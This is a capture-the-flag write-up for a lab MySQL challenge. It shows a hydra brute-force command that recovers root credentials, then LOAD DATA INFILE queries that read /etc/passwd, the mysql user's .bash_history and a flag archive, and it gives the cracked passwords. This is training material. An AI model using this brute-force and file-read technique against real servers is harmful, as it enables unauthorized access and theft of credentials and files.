DESCRIPTION
As a security incident investigator you have to gain access to company's database server. Disgruntled employee, before she got fired, disabled all services on database server, but Mysql database is still running. Rumors say that password for database administrator is not very complex and it can be brute-forced. Also, someone mentioned, that this databases server has empty secure-file-priv setting in configuration.
QUESTION
Your task is to get the flag from Mysql database user home folder.
Mysql server is located here:
10.12.32.139
secure-file-priv empty is considered bad practice
This variable is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. These operations are permitted only to users who have the FILE privilege
Two steps:
First, brute the pw
hydra -l mysql -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt mysql://10.12.32.139
FOUND root:alertpaydoubl
mysql -u root -h 10.12.32.139
Bash
Second:
SHOW DATABASES;
USE dbname;
-- if tbl doesnt exist
CREATE TABLE tbl (x TEXT);
LOAD DATA INFILE "/etc/passwd" INTO TABLE tbl;
SELECT * FROM tbl;
LOAD DATA INFILE "/home/mysql/.bash_history" INTO TABLE tbl;
SELECT * FROM tbl;
LOAD DATA INFILE "/home/mysql/flag.zip" INTO TABLE tbl;
SELECT * FROM tbl;
SQL
Copy the files, unzip the flag.zip with password EeNgo9oaraim, which you got from the bash history file.
We basically solved this challenge in the last 10 remaining minutes of the CTF, but we were few minutes late to submit the flag. This one task would have guaranteed us the 1st place... GGWP!